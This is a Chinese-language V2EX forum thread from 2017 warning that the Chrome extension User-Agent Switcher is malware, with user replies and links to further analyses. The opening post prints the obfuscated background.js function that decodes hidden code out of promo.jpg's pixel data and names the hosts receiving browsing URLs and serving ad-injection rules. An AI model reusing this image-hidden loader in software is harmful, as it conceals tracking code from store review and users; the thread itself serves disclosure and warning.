首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  浏览器

大家注意了 Chrome 的插件 User-Agent Switcher 是个木马

  anoymoux · 2017-09-09 06:27:10 +08:00 · 34861 次点击
这是一个创建于 743 天前的主题,其中的信息可能已经有所发展或是发生改变。
chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }
会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619

111 回复  |  直到 2017-11-22 16:53:01 +08:00
1  2  
    101
chanssl   2017-09-10 20:09:20 +08:00
日狗了,竟然是恶意程序,中奖了
    102
Bailang   2017-09-10 21:15:38 +08:00
    103
chroming   2017-09-10 22:54:44 +08:00
突然发现去年就有人发现这个扩展有问题了: https://www.v2ex.com/t/263719
    104
Bailang   2017-09-11 09:52:04 +08:00
转载 侵删

https://x.threatbook.cn/article?threatInfoID=113
有人贴出了这个 policy

Collected Information.

Accessing and Using the Services.
When users access or use the Services, certain non-personally and personally identifiable information (the "User Information") is collected, stored and used for business and marketing purposes, such as maintaining and improving the Services, conducting research, and monetization. This User Information includes, without limitation: IP address, unique identifier number, operating system, browser information, URLs visited, data from URLs loaded and pages viewed, search queries entered, social connections, profile properties, contact details, usage data, and other behavioral, software and hardware information. If you access the Services from a mobile or other device, we may collect a unique device identifier assigned to that device or other information for that device in order to serve content to it. This collected data may also be supplemented with information obtained from third parties or submitted by users.
    105
nyanyh   2017-09-11 11:52:12 +08:00
@acess omg...我还用着 Better History,有时候 Surge 里看到随机的 dwoqpurpfdjksla.lan 这种奇怪的域名不知道是不是这个扩展搞的
    106
xssnull   2017-09-12 14:09:03 +08:00
@anoymoux 这个反混淆做的真赞,咋做的分享下啊
    107
cyg07   2017-09-20 19:10:53 +08:00
@redsonic   @anoymoux @xssnull

360CERT 的具体分析

"Chrome 插件 User – Agent Switcher 恶意代码分析报告 "

http://mp.weixin.qq.com/s/iqXL7VQxdX6T7UVwj5PBHw
    108
ariza   2017-09-22 10:23:32 +08:00
为毛依然屹立不倒。。
    109
anoymoux   2017-09-22 10:45:46 +08:00
@ariza 尴尬..还涨了 5 万用户...
    110
lyragosa   2017-10-18 23:32:49 +08:00
我似乎就是这个插件……吓得我赶紧删掉了
    111
iVeego   2017-11-22 16:53:01 +08:00
@anoymoux #109 越来越多了...😅😅😅
1  2  
关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2086 人在线   最高记录 5043   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.3 · 23ms · UTC 02:11 · PVG 10:11 · LAX 19:11 · JFK 22:11
♥ Do have faith in what you're doing.